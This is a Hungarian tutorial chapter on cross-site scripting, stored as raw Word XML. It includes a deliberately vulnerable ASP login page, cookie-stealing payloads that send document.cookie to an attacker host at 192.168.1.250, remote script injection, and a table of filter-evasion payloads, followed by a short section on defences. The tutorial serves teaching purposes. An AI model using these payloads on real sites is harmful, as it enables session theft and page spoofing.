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hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Cross Site Scripting (XSS)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Cross Site Scripting alapgondolata, hogy egy scriptet helyezünk el egy adott oldalon, ami bizonyos információkat juttat el nekünk. Mi értelme van ennek, merülhet fel a kérdés, hiszen ha fel tudtuk törni a weboldalt, és elhelyeztük a scriptünket, miért lenne rá szükség? Nos azért, hogy egy scriptet bejuttassunk egy weboldalra, egyáltalán nincs szükség a feltörésre. A feltöréshez viszont jó, hiszen nagyon sok weboldal tartalmaz például fórumot, ahová a felhasználók leírhatják hozzászólásaikat.. Ide így mi is írhatunk. Nem kell többet tenni, mint elhelyezni valami csábító nevű linket, amire remélhetőleg sokan rákattintanak, a link pedig a mi oldalunkra mutat, ahová elküldi például a weboldalon a felhasználó azonosítására használt cookie-t. Jól használható arra is, hogy hozzáférjünk egy adott személy postafiókjához. Az eljárás hasonló: küldünk az illetőnek egy e-mailt egy linkkel, és ha a címzettünk webes felületen nyitja meg és rákattint a linkre, akkor megszerezhetjük a cookie-t, ezáltal hozzáférhetünk a postafiókjáho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i a feltétele annak, hogy ilyen támadást vihessünk véghez? Az, hogy az adott weboldal hajlandó legyen lefuttatni egy scriptet. Ehhez pedig az szükségeltetik, hogy valamilyen a felhasználó által beadott adatot változatlanul megjelenítsen a következő oldalon. Erre nagyon sok keresőprogram képes, kiírják, hogy milyen szavakra kerestünk rá, vagy léteznek „udvarias” weblapok, amelyek a felhasználói néven „szólítják” a látogatót. Ez utóbbi esetben nem a web szerver a hibás, nem is a böngésző, hanem az egyedi alkalmazás, amit a weboldal üzemeltetője készített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aradjunk az előző, már jól kiismert asp programnál, csak egészítsük ki, hogy érzékeny legyen az XSS támadásra. Módosítjuk is, hogy visszaadja a felhasználó nevét is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%@ Language = "VBScript" %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html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head&gt;&lt;title&gt;Login Page&lt;/title&gt;&lt;/head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%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f Request.Form("action") &lt;&gt; "validate_login" The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form action="xss1.asp" method="post"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nput type="hidden" name="action" value="validate_login" /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Login:&lt;input type="text" name="login" /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Password:&lt;input type="password" name="password" /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nput type="submit" VALUE="Login" /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form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%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sr=Request.Form("login"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trSQL = "SELECT * FROM tblLoginInfo WHERE username='" &amp; Replace(usr, "'", "''") &amp; "' " &amp; "AND password='" &amp; Replace(Request.Form("password"), "'", "''") &amp; "';"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et connection = Server.CreateObject("ADODB.Connection"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onnection.Open("DRIVER={Microsoft Access Driver (*.mdb)};DBQ=" &amp; Server.MapPath("login.mdb")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et CanLogin = connection.Execute(strSQL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b/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>response.write usr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If Not CanLogin.EOF The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IKERULT BELEPNI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%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ls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NEM JOTT OSSZ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a href="xss1.asp"&gt;Ismet&lt;/a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%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 If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anLogin.Clos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et CanLogin = Nothing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connection.Clos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Set connection = Nothing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End If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%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body&gt;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html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mi érzékennyé teszi az új programot erre a támadási formára a 20. sorban található, ahol egy megadott input paramétert ellenőrzés és változtatás nélkül visszaküld a legenerált HTML kódban. Jelen esetben a felhasználó neve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Alapo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hhoz, hogy teszteljük, valóban alkalmas-e cross site scripting támadásra, próbáljunk elküldeni egy egyszerű scriptet, mint felhasználó neve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&gt;alert('XSS')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zel a felhasználó névvel valószínűleg nem tudunk belépni, de minket az nem is érdekel. Ha az alábbi ablak jelenik meg, akkor az oldal támadható, és mi csak ennyit akartunk tudn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1678940" cy="101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Cookie ellop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Ez persze nem túl nagy dolog, hogy megjelent egy ablak, de tegyük fel, hogy a weboldal cookie-kat használ, és ezeket lopjuk el. Az egyszerűség kedvéért most tegyük fel, hogy ez egy fórum, ahová a támadó szabadon beírhat szöveget, például egy linket, és azon keresztül szeretné ellopni mások kapcsol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hhoz, hogy a weboldal cookie-t használjon, a 22. sor elé a következőt kell írn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Response.Cookies("username")=us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ost nem írunk meg egy fórum engine-t, mert az túl hosszú lenne, hanem helyette a „sikerült belepni” szöveget (23. sor) írjuk át arra, amit a támadónak be kellene küldenie, hogy működjön a módszer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lőször is olvassuk ki a cookie-t, és jelenítsük meg egy ablakban. Ehhez az előzőek alapján könnyen kitalálható scriptet kell a támadónak beírni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&gt;alert(document.cookie)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Válaszként a következő ablak jelenik meg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305300" cy="1133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De sajnos ebből a támadó még nem tudja meg a cookie-t, mert ez a felhasználó képernyőjén jelenik meg. Hogyan lehetne ezt az információt hozzá eljuttatni? A probléma az, hogy simán a „B” weboldalról nem kérdezhetem le, hogy az „A” weboldal milyen cookie-t használ, ezt már nagyon régen nem engedik a böngészők. Hogyan tudom akkor mégis kijuttatni ezt az információt? Úgy, hogy megnyitok a saját weboldalamon (olyan kell, aminek hozzáférek a logjaihoz) egy ilyen nevű képet. Ekkor a web szerver logokból ez az információ kiolvasható. Ehhez a következő scriptet kell elhelyeznün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&gt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kep = new Image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kep.src = "http://192.168.1.250/kep2.gif" + document.cookie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192.168.1.250-es gép logjában a következőt fogjuk látni (kétszer futtattam, azért látszik két sor)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757545" cy="596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57559" r="-5" b="97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mennyiben nincs hozzáférésünk a logfájlokhoz, akkor további lehetőség, hogy egy weboldalt készítünk, ami nem csinál mást, mint a neki paraméterként átadott adatot lementi. Ehhez az alábbi kódot kell bejuttatnun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ujablak = open("http://192.168.1.250/aaa.php?adat=" + document.cookie, "ujablak","width=1,height=1,status=no,toolbar=no,menubar=no")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jablak.document.open();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ujablak.document.close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Sajnos ilyenkor megjelenik egy pop-upokat tiltó figyelmeztetés is, amit a felhasználó lehet, hogy nem engedélyez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753100" cy="197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9827" r="-5" b="44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 ilyet nem szeretnénk kapni, akkor nem pop-up ablakként kell megnyitni az új weboldalt, hanem például betölthetjük egy iframe-be is. Az iframe az „inline frame”-nek a rövidítése, ez az objektum egy HTML oldalon lehetővé teszi, hogy egy másik HTML oldal tartalmát jelenítsük meg. Mi persze semmit nem akarunk megjeleníteni, sőt a méretét is elég kicsire, mondjuk 0-szor 0-ra tesszük, hogy a felhasználó véletlenül se vegye észre. Ehhez a következő scriptet kell beküldenün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&gt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document.write('&lt;iframe src="http://192.168.1.250/aaa.php?adat=' + document.cookie + '" width=0 height=0&gt;&lt;/iframe&gt;'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hu-HU"/>
        </w:rPr>
        <w:t>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Tartalom megváltozta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sonló technikával elérhetjük, hogy egy weblap tartalma helyett teljesen más jelenjen meg, pl. vegyük a következő esete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an egy weblap, amin linkek szerepeln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HTML&gt;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20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>&lt;BODY&gt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a href=http://192.168.1.100/xss3.asp?link=link1&gt;link1&lt;/a&gt;&lt;br&gt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a href=http://192.168.1.100/xss3.asp?link=link2&gt;link2&lt;/a&gt;&lt;br&gt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a href=http://192.168.1.100/xss3.asp?link=link3&gt;link3&lt;/a&gt;&lt;br&gt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BODY&gt;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HTML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nden link meghív egy másik ASP lapot, ami kiírja a link tartalmát, mint címet, és más-más szöveget tölt b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HTML&gt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0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>&lt;% link=Request.QueryString("link")%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!--#include file="keret.html"--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br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h2&gt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0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>&lt;% Response.Write(link)%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h2&gt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0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>&lt;% if link="link1" then %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!--#include file="link1.html"--&gt;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20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>&lt;% end if %&gt;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/HTML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bben az esetben, amikor valaki rákattint a link1 szövegre, a következő oldal hívódik l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http://192.168.1.100/xss3.asp?link=link1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lőző alertes módszerrel tesztelhetem, hogy érzékeny-e a weboldal a cross site scriptingre, beírom a következő címet az URL-b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http://192.168.1.100/xss3.asp?link=</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert("aaa")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Ha megjelenik a figyelmeztető ablak, akkor érzékeny. Ezek után például a következőt csinálhatju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saját weboldalunkra (na jó, nem muszáj a sajátunkra, elég valami kínai, litván,stb. ingyenes webtárhely) tegyük fel a következő javascipt kódo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ocument.write("Ez a tamado szovege&lt;br&gt;")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document.write("itt folytatodik")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…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után hívjuk meg az előző oldalt a következő módon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http://192.168.1.100/xss3.asp?link=&lt;script%20src="http://192.168.1.250/tamado.js"&gt;&lt;/script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Mint látszik a támadó scriptje a 192.168.1.250-es gépen van. Ekkor a következő fog megjelenni az eredeti helyett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349885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="35052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pt;margin-top:27.55pt;width:275.95pt;height:26.95pt;mso-wrap-style:none;v-text-anchor:middle">
                <v:fill o:detectmouseclick="t" on="false"/>
                <v:stroke color="black" weight="381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581400" cy="16014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31105" b="57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redeti pedig így nézett k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2133600" cy="19418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62876" b="530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Vegyük észre, hogy látszólag még mindig a valódi gépről jön a tartalom. Amennyiben nem HTTP GET, hanem HTTP POST metódust használna a weblap, akkor az oldal címénél a ?link= &lt;script=… egyáltalán nem is jelenne meg a felhasználónak. Ő teljes joggal azt hihetné, hogy az eredeti oldalon van, és a valódi tartalmat olvassa, pláne, hogy az eredeti céges fejléc, egyebek is megmaradnak. A linket csak be kell tenni egy email-be, elküldeni a célfelhasználóknak, vagy valamilyen nyilvános fórumba feltölteni, és kész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Milyen utasításokkal próbálkozhatunk még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7"/>
        <w:gridCol w:w="3070"/>
      </w:tblGrid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Példa szintax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hu-HU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Mire használjuk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script&gt;alert(document.cookie)&lt;/script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Teszteljük, hogy érzékeny-e a weboldal, a leggyakoribb script tag-et használjuk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script src=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>”http://tamado.ch/a.js”&gt;</w:t>
            </w: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/script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Egy hosszabb scriptet szeretnénk beszúrni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img src=”” onerror=”alert(document.cookie)”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 egy weboldal kiszűri a &lt;script&gt; &lt;/script&gt; tag-eket, akkor egy hibakezelésbe is elrejthetjük a kódunkat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img src=javascript:alert(document.cookie)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 már img objektum, akkor használhatjuk annak az src paraméterét is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br style=”width:expression(alert(document.cookie))”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 a weboldal szűri a javascript kulcsszót, még lehet próbálkozni az expressionnal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iframe src=”javascript:alert(document.cookie)”&gt;&lt;/iframe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Egy inline frame-be is betölthetjük a kódunkat, mint arra már láttunk példát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body onload=”alert(document.cookie)”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A lap betöltődésekor lefut a megadott kód. Nem baj, ha van már másik body tag, a HTTP nem száll el ettől.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meta http-equiv=”refresh” content=”0;url=javascript:alert(document.cookie)”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sználhatjuk a meta tageket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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hu-H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hu-HU"/>
              </w:rPr>
              <w:t>&lt;INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"&gt;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hu-HU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Használhatjuk az input HTML taget is.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Védekezé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Számos weboldal próbál úgy védekezni a cross site scripting ellen, hogy szűri a HTML bejegyzéseket, pl. az összetartozó &lt;&gt; jeleket és a köztük lévő szöveget kitörli. Elsőre ez jó módszernek tűnhet, de mégsem az. A böngészők ugyanis fel vannak készítve arra az esetre, hogy lusta programozók lefelejtik a záró tageket, és automatikusan kiegészítik. Lehet próbálkozni például a következő szövegekke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MG SRC="javascript:alert('XSS')"</w:t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SCRIPT SRC=http://192.168.1.250/xss.js?&lt;B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z elsőnél nincsen záró tag, a másodiknál pedig két nyitó tag van egymás után, „ki van felejtve” a záró tag. A legtöbb olyan szűrő algoritmus, ami úgy próbálja azonosítani a HTML szöveget, hogy az összetartozó &lt;&gt; jelek közötti részt tekinti annak, ezeket szépen átengedi, legfeljebb a &lt;B&gt;- t törli ki, ami nem igazán érdekel egy támadót. A böngésző viszont „okos”, úgyhogy ki fogja javítani az emberi „hibát”. Próbálkozhatunk azzal is, hogy a végére egy üres nyitó tag-et teszün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frame src=http://ha.ckers.org/scriptlet.html &l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hhoz, hogy ezeket is helyesen lekezeljük, gyakorlatilag egy teljes HTML parsert kellene írni a programunkba. Ez lehetetlen, már csak azért is, mert különböző böngészőknél, verzióknál változik, hogy melyik mit tud „kijavítani”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Egy másik szűrési mód, hogy bizonyos tag-eket, pl.: javascript kiszűrnek. Ilyenkor jó módszer, lehet, ha ascii-ban kódolva írjuk a szöveget, így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MG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;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Ez a következőt takarj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MG SRC=javascript:alert('XSS')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nnek egy változata, ha UTF-8-as kódokkal próbálkozunk, az előző példa így néz ki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MG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041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gyszerűbb szűrőknél segíthet, ha tabokat vagy sortöréseket teszünk a szövegbe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  <w:t>&lt;IMG SRC="jav</w:t>
        <w:tab/>
        <w:t>ascript:alert('XSS');"&g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hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"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Manapság elfogadott védekezésnek számít, hogy szerver oldalon a felhasználó által feltöltött adatokban cseréljük le a &lt; &gt;, ( ), =, ” ’, ;, %, &amp; karaktereket a velük egyenértékű HTML tag-ekre, pl. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">&amp;lt a &lt; helyett, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">gt a </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> jel helyett, és így tovább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Kliens oldalon soha ne Internetezzünk adminisztrátori jogokkal, mert ezzel csökkentjük a minket érhető kárt. Ha lehetőségünk van rá, tiltsuk le a scripteket a böngészőben, de ezzel sajnos sok weboldalt is használhatatlanná teszünk, mert egyre több alkalmazza a scripteket. Alaposan nézzük meg, milyen linkre kattintunk rá, ne csak a link szövegét olvassuk el, hanem nézzük meg azt is, hogy hová mut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+1">
    <w:altName w:val="Times New Roman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rPr/>
    </w:pPr>
    <w:r>
      <w:rPr/>
      <w:t>13.fejezet</w:t>
      <w:tab/>
      <w:t>Cross Site Scripting</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val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rPr/>
    </w:pPr>
    <w:r>
      <w:rPr/>
      <w:t>13.fejezet</w:t>
      <w:tab/>
      <w:t>Cross Site Scripting</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val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TimesNewRoman+1;Times New Roman" w:hAnsi="TimesNewRoman+1;Times New Roman" w:cs="TimesNewRoman+1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NewRoman+1;Times New Roman" w:hAnsi="TimesNewRoman+1;Times New Roman" w:cs="TimesNewRoman+1;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kk">
    <w:name w:val="cikk"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:autoSpaceDE w:val="false"/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="TimesNewRoman,Bold;Times New Roman" w:hAnsi="TimesNewRoman,Bold;Times New Roman" w:cs="TimesNewRoman,Bold;Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:lang w:val="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bekezdes">
    <w:name w:val="bekezdes"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:autoSpaceDE w:val="false"/>
      <w:spacing w:before="0" w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="TimesNewRoman;Times New Roman"/>
      <w:lang w:val="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLkntformzott">
    <w:name w:val="HTML-ként formázott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5:39:00Z</dcterms:created>
  <dc:creator>zspetya</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>NetAcademia</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-10-12T19:23:00Z</dcterms:modified>
  <cp:revision>5</cp:revision>
  <dc:subject/>
  <dc:title>Cross Site Scripting (XSS)</dc:title>
</cp:coreProperties>
</file>